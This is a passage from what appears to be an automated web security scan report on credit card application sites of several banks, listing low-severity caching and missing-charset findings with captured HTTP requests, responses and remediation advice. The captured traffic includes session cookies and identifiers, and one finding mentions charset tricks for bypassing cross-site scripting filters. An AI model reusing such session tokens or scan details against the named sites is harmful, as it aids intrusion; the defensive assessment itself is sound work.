Server: IBM_HTTP_Server
Last-Modified: Thu, 30 Sep 2010 03:23:01 GMT
ETag: "d6b4-33b-98660f40"
Accept-Ranges: bytes
Content-Length: 827
Connection: close
Content-Type: text/plain

# American Express
# Format is:
# User-agent: <name of spider>
# Disallow: <nothing> | <path>
# Date By Reason
# 20011119 SEU Initial robots
# 20090810 AET Prevent inde
...[SNIP]...

21. Cacheable HTTPS response previous next
There are 15 instances of this issue:

https://applynowdc1.chase.com/FlexAppWeb/styles/flexapp/document/blank.html
https://applynowdc2.chase.com/FlexAppWeb/styles/flexapp/document/blank.html
https://creditcards.citi.com/affinity_code_mappings.csv
https://wtp101.com/
https://www.accountonline.com/ACQ/DisplayTerms
https://www.applyonlinenow.com/USCCapp/static/error.html
https://www.applyonlinenow.com/error.html
https://www.applyonlinenow.com/us/bmm00/security.html
https://www.discovercard.com/cardmembersvcs/acqs/app/exec
https://www.discovercard.com/cardmembersvcs/acqs/app/getCollegeByCityState
https://www.discovercard.com/cardmembersvcs/acqs/app/getDisclosure
https://www.discovercard.com/cardmembersvcs/acqs/app/getapp
https://www.discovercard.com/discover/data/student_annual_household_income.shtml
https://www.discovercard.com/discover/data/student_other_household_income.shtml
https://www.discovercard.com/includes/universal-cbb-overlay.html

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

21.1. https://applynowdc1.chase.com/FlexAppWeb/styles/flexapp/document/blank.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://applynowdc1.chase.com
Path:	/FlexAppWeb/styles/flexapp/document/blank.html

Request

GET /FlexAppWeb/styles/flexapp/document/blank.html HTTP/1.1
Host: applynowdc1.chase.com
Connection: keep-alive
Referer: https://applynowdc1.chase.com/FlexAppWeb/renderApp.do?SPID=DF92&CELL=6H8X&AFFID=EhraRx8K_BE-rs08mTiqNvJG3ktOS3.NLg&pvid=1118b79220110c061317070b00ed04
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; FlexSessionID=Yqv1N71Nh3KMpxQ41JvJFjTwbJczJGSSL2pQthy2QY1JRMTy16LF!-1254913621

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Fri, 17 Jun 2011 12:06:41 GMT
Content-length: 89
Content-type: text/html
Last-modified: Thu, 29 Jul 2010 21:58:13 GMT
Etag: "59-4c51f975"
Accept-ranges: bytes

<html><head><META HTTP-EQUIV="CACHE-CONTROL" CONTENT="PUBLIC"></head><body></body></html>

21.2. https://applynowdc2.chase.com/FlexAppWeb/styles/flexapp/document/blank.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://applynowdc2.chase.com
Path:	/FlexAppWeb/styles/flexapp/document/blank.html

Request

GET /FlexAppWeb/styles/flexapp/document/blank.html HTTP/1.1
Host: applynowdc2.chase.com
Connection: keep-alive
Referer: https://applynowdc2.chase.com/FlexAppWeb/renderApp.do?SPID=DDC6&CELL=6H8X&AFFID=EhraRx8K_BE-_MhHJTif62ygzUrUQp39HQ&pvid=112f187020110c068a17079d134503
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; FlexSessionID=1TGbN7FVBGGzQCWCJQGj1NjbdF2yLlNWWnQQCRRk4LZGdQTVYyMd!1032868453

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Fri, 17 Jun 2011 12:14:19 GMT
Content-length: 89
Content-type: text/html
Last-modified: Fri, 30 Jul 2010 09:04:10 GMT
Etag: "59-4c52958a"
Accept-ranges: bytes

<html><head><META HTTP-EQUIV="CACHE-CONTROL" CONTENT="PUBLIC"></head><body></body></html>

21.3. https://creditcards.citi.com/affinity_code_mappings.csv previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://creditcards.citi.com
Path:	/affinity_code_mappings.csv

Request

GET /affinity_code_mappings.csv HTTP/1.1
Host: creditcards.citi.com
Connection: keep-alive
Referer: https://creditcards.citi.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mbox=check#true#1308314721|session#1308314660372-297100#1308316521; s_pers=%20gpv_p7%3DRESP%252FCredit%2520Cards%2520from%2520Citi%2520Cards%2520%257C%2520Compare%2520and%2520Apply%2520Online%2520-%2520Citi.com%2520Credit%2520Cards%7C1308316461176%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Length: 798
Content-Type: application/octet-stream
Content-Location: https://creditcards.citi.com/affinity_code_mappings.csv
Last-Modified: Fri, 13 May 2011 04:51:33 GMT
Accept-Ranges: bytes
ETag: "bc7ec66e2911cc1:1b5e"
Date: Fri, 17 Jun 2011 12:44:21 GMT

Hero home page ACQ,14V
Hero home page ACQ College,0ZQ
Hero home page ECM,14W
Hero home page College,0ZR
Featured card home page ACQ,14X
Featured card page ACQ College,0ZS
Featured card home page
...[SNIP]...

21.4. https://wtp101.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://wtp101.com
Path:	/

Request

GET / HTTP/1.1
Host: wtp101.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=73b6b0a9-a657-4959-8c44-a72cc1d5226b

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:33:17 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8o
Last-Modified: Sun, 06 Jun 2010 13:01:10 GMT
ETag: "1221c6-2d-4885c266eb180"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 45
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<html><body><h1>It works!</h1></body></html>

21.5. https://www.accountonline.com/ACQ/DisplayTerms previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.accountonline.com
Path:	/ACQ/DisplayTerms

Request

GET /ACQ/DisplayTerms?sc=4DNZJG213CJ5MDQ95ZW&app=UNSOL&siteId=CB&langId=EN&BUS_TYP_CD=CONSUMER&DOWNSELL_LEVEL=2&BALCON_SC=&B=M&DOWNSELL_BRANDS=M,M,&DownsellSourceCode1=4DNZKFY13CJ5MDQ95ZW&B1=M&DownsellSourceCode2=4DNZLFZ13CJ5MDQ95ZW&B2=M&t=t&d=&uc=ALS&AMEX_PID_AF_CODE=&AAPID= HTTP/1.1
Host: www.accountonline.com
Connection: keep-alive
Referer: https://www.citicards.com/cards/acq/Apply.do?app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer_631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: ""
Date: Fri, 17 Jun 2011 12:26:39 GMT
Content-type: text/html;charset=ISO-8859-1
P3p: CP="CAO DSP COR CURa ADMa DEVa IVAa IVDa CONa TELa OUR SAMa NOR PHY ONL UNI FIN COM NAV INT DEM CNT PRE TST"
Content-language: en-US
Vary: accept-encoding
Content-Length: 19349

<html>
<script type="text/javascript" src="/cards/svc/js/common.js"></script>
<script type="text/javascript">
var tokenName="SESSION_TRANSACTION_ID_PLUGI
...[SNIP]...

21.6. https://www.applyonlinenow.com/USCCapp/static/error.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.applyonlinenow.com
Path:	/USCCapp/static/error.html

Request

GET /USCCapp/static/error.html?error_code=1001 HTTP/1.1
Host: www.applyonlinenow.com
Connection: keep-alive
Referer: https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJCQ&GV10=H|267|K49670&GV1=H%7C143%7Cgan_631529122
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1308312903|session#1308312842615-157926#1308314703; cmRS=&t1=1308312848756&t2=1308312855857&t3=1308313519051&lti=1308313519051&ln=&hr=javascript%3AOpenWin%28display%3Fpageid%3Dpopup%26textid%3Dfaq1%2C395%2C279%2Cnewwin%29&fti=&fn=CRD%20APP%20-%20ao_Your%20Information%20-%20Viewed_application.formApply%3A0%3B&ac=&fd=&uer=&fu=&pi=Application%3A%20CRD%20APP%20-%20ao%20Step%3A%20100%20%28Your%20Information%20-%20Viewed%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394&ul=https%3A//www.applyonlinenow.com/USCCapp/Ctl/entry%3Fsc%3DUABJCQ%26GV10%3DH%7C267%7CK49670%26GV1%3DH%257C143%257Cgan_631529122&rf=http%3A//www.creditcards.com/oc/%3Fpid%3D22065113%26pg%3D11%26pgpos%3D5; JSESSIONID=0000DL_51K3vXDPkmRbZIB-wqAl:-1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:25:20 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2
Last-Modified: Wed, 04 Nov 2009 19:27:38 GMT
Content-Length: 2018
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>We apologize for any inconvenience.</title
...[SNIP]...

21.7. https://www.applyonlinenow.com/error.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.applyonlinenow.com
Path:	/error.html

Request

GET /error.html HTTP/1.1
Host: www.applyonlinenow.com
Connection: keep-alive
Referer: https://www.applyonlinenow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=session#1308312842615-157926#1308315442|check#true#1308313642; JSESSIONID=00007zMHwirPALm5iS-plnK6hH9:-1; cmRS=&t1=1308313583239&t2=1308313583545&t3=1308313587304&t4=1308313571532&fti=&fn=CRD%20APP%20-%20ao_Your%20Information%20-%20Viewed_application.formApply%3A0%3B&ac=&fd=&uer=&fu=&pi=Application%3A%20CRD%20APP%20-%20ao%20Step%3A%20100%20%28Your%20Information%20-%20Viewed%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394&ul=https%3A//www.applyonlinenow.com/USCCapp/Ctl/entry%3Fsc%3DUABJCQ%26GV10%3DH%7C267%7CK49670%26GV1%3DH%257C143%257Cgan_631529122&rf=http%3A//www.creditcards.com/oc/%3Fpid%3D22065113%26pg%3D11%26pgpos%3D5

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:26:26 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2
Last-Modified: Thu, 17 Jan 2008 12:06:07 GMT
ETag: "b9c106-edb-443e9d9c749c0"
Accept-Ranges: bytes
Content-Length: 3803
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head>

<meta http-equiv="content-type" content="text/html; charset=UTF-8"><titl
...[SNIP]...

21.8. https://www.applyonlinenow.com/us/bmm00/security.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.applyonlinenow.com
Path:	/us/bmm00/security.html

Request

GET /us/bmm00/security.html HTTP/1.1
Host: www.applyonlinenow.com
Connection: keep-alive
Referer: https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJCQ&GV10=H|267|K49670&GV1=H%7C143%7Cgan_631529122
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=session#1308312842615-157926#1308315393|check#true#1308313593; JSESSIONID=0000lcAcD06a_wBNzl8WT1kWWEN:-1; cmRS=&t1=1308313536718&t2=1308313540976&t3=1308313541129&t4=1308313531074&lti=1308313541129&ln=&hr=javascript%3AOpenWin%28/us/bmm00/security.html%2C395%2C279%29%3B&fti=&fn=CRD%20APP%20-%20ao_Your%20Information%20-%20Viewed_application.formApply%3A0%3B&ac=&fd=&uer=&fu=&pi=Application%3A%20CRD%20APP%20-%20ao%20Step%3A%20100%20%28Your%20Information%20-%20Viewed%29&ho=data.coremetrics.com/eluminate%3F&ci=90010394&ul=https%3A//www.applyonlinenow.com/USCCapp/Ctl/entry%3Fsc%3DUABJCQ%26GV10%3DH%7C267%7CK49670%26GV1%3DH%257C143%257Cgan_631529122&rf=http%3A//www.creditcards.com/oc/%3Fpid%3D22065113%26pg%3D11%26pgpos%3D5

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:25:41 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2
Last-Modified: Tue, 14 Apr 2009 13:25:19 GMT
ETag: "c6caf6-137e-46783c321edc0"
Accept-Ranges: bytes
Content-Length: 4990
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
       <meta content="index,fol
...[SNIP]...

21.9. https://www.discovercard.com/cardmembersvcs/acqs/app/exec previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/cardmembersvcs/acqs/app/exec

Request

Response

21.10. https://www.discovercard.com/cardmembersvcs/acqs/app/getCollegeByCityState previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/cardmembersvcs/acqs/app/getCollegeByCityState

Request

GET /cardmembersvcs/acqs/app/getCollegeByCityState?city=null&state=&rand=0.0320243751630187 HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/acqs/app/getapp?sc=RJCT&iq_id=e11104bb02011c1068c17074e28a433
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313791|session#1308313730257-773381#1308315591

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:28:57 GMT
Server: Apache
x-wily-info: Clear guid=9D935AE30A07140C59125912777A1027
x-wily-servlet: Encrypt1 U+w0Pb5QTikwsT8iugvWOJNu7fg/9GyIIBtkAOCoPV3XLJ8bKoAP5Qp4UeZYQhg/EOPPu3f/MWLkbqeCF94+ffXlkdXToIemaij8eitKNxYVnSX84prIlAieVCVl3mCloLlJhr6obl/4Ye19y44eB5yYnNXNk4EO+simsERXK6TADthgUSpN3bo6FU/OktNT
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/xml; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 194

<?xml version="1.0" encoding="ISO-8859-1"?>

<searchResult>
   <status>VALIDATION_ERROR</status>
   <message><![CDATA[Both city and state cannot be empty]]></message>

</searchResult>

21.11. https://www.discovercard.com/cardmembersvcs/acqs/app/getDisclosure previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/cardmembersvcs/acqs/app/getDisclosure

Request

GET /cardmembersvcs/acqs/app/getDisclosure?sourceCode=&rand=0.31121409172192216 HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/acqs/app/getapp?sc=RJCT&iq_id=e11104bb02011c1068c17074e28a433
Cache-Control: max-age=0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313810|session#1308313730257-773381#1308315610|disable#browser%20timeout#1308317346

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:29:54 GMT
Server: Apache
x-wily-info: Clear guid=9D9437B10A07140C59125912B48B9666
x-wily-servlet: Encrypt1 U+w0Pb5QTikwsT8iugvWOJNu7fg/9GyIIBtkAOCoPV3XLJ8bKoAP5Qp4UeZYQhg/EOPPu3f/MWLkbqeCF94+ffXlkdXToIemaij8eitKNxYVnSX84prIlAieVCVl3mCloLlJhr6obl/4Ye19y44eB5yYnNXNk4EO+simsERXK6TADthgUSpN3bo6FU/OktNT
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/xml; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2361

<searchResult>
   <status>OK</status>
   <message><![CDATA[Request successful]]></message>
   <skinId>STUDAF</skinId>
   <paStatus>false</paStatus>
   <cbOrigin>false</cbOrigin>


                   <off
...[SNIP]...

21.12. https://www.discovercard.com/cardmembersvcs/acqs/app/getapp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/cardmembersvcs/acqs/app/getapp

Request

Response

21.13. https://www.discovercard.com/discover/data/student_annual_household_income.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/discover/data/student_annual_household_income.shtml

Request

GET /discover/data/student_annual_household_income.shtml HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/acqs/app/getapp?sc=RJCT&iq_id=e11104bb02011c1068c17074e28a433
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313791|session#1308313730257-773381#1308315591

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:28:53 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 949
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<link href="/discover/stylesheets
...[SNIP]...

21.14. https://www.discovercard.com/discover/data/student_other_household_income.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/discover/data/student_other_household_income.shtml

Request

GET /discover/data/student_other_household_income.shtml HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/acqs/app/getapp?sc=RJCT&iq_id=e11104bb02011c1068c17074e28a433
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313791|session#1308313730257-773381#1308315591

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:28:55 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 907
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<link href="/discover/stylesheets/acqu
...[SNIP]...

21.15. https://www.discovercard.com/includes/universal-cbb-overlay.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/includes/universal-cbb-overlay.html

Request

GET /includes/universal-cbb-overlay.html?endsWith=function%20(str)%20{return%20(this.match(str+%22$%22)==str)}&trim=function%20(){return%20this.replace(/^\s\s*/,%20'').replace(/\s\s*$/,%20'');} HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/acqs/app/getapp?sc=RJCT&iq_id=e11104bb02011c1068c17074e28a433
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313810|session#1308313730257-773381#1308315610|disable#browser%20timeout#1308317346

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:29:17 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 2881
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

               <div class="left-side" id="cbb-copy">
                   <img src="/cashbackbonus/images/deal-icons/icon-jul-sep.png" alt="5%" title="5%" id="cbb-icon" />
                   <h1><em>Cashback Bonus</em></h1>
                   <h2>Fre
...[SNIP]...

22. HTML does not specify charset previous next
There are 6 instances of this issue:

https://applynowdc1.chase.com/FlexAppWeb/styles/flexapp/document/blank.html
https://applynowdc2.chase.com/FlexAppWeb/styles/flexapp/document/blank.html
http://creditcards.citicards.com/usc/_include/SiteCatalyst_2011/s_code_vendor_v53.js
http://ds.addthis.com/red/psi/sites/blogs.creditcards.com/p.json
http://tags.bluekai.com/site/2939
https://wtp101.com/

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

22.1. https://applynowdc1.chase.com/FlexAppWeb/styles/flexapp/document/blank.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://applynowdc1.chase.com
Path:	/FlexAppWeb/styles/flexapp/document/blank.html

Request

Response

22.2. https://applynowdc2.chase.com/FlexAppWeb/styles/flexapp/document/blank.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://applynowdc2.chase.com
Path:	/FlexAppWeb/styles/flexapp/document/blank.html

Request

Response

22.3. http://creditcards.citicards.com/usc/_include/SiteCatalyst_2011/s_code_vendor_v53.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/_include/SiteCatalyst_2011/s_code_vendor_v53.js

Request

GET /usc/_include/SiteCatalyst_2011/s_code_vendor_v53.js HTTP/1.1
Host: creditcards.citicards.com
Proxy-Connection: keep-alive
Referer: http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer%5F631529043&ProspectID=36CEB96C744948E481109575676DCE63
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBTSES=SID=9604C72A5ED94040BC422315B5336491

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server:
Date: Fri, 17 Jun 2011 12:12:53 GMT
Connection: close
Content-Length: 40129

/* SiteCatalyst code version: H.22.1.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */
/************************ ADDITIONAL FEATURES ***********
...[SNIP]...

22.4. http://ds.addthis.com/red/psi/sites/blogs.creditcards.com/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/blogs.creditcards.com/p.json

Request

GET /red/psi/sites/blogs.creditcards.com/p.json?callback=_ate.ad.hpr&uid=4dce8a530508b02d&url=http%3A%2F%2Fblogs.creditcards.com%2F&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&kh6d7b HTTP/1.1
Host: ds.addthis.com
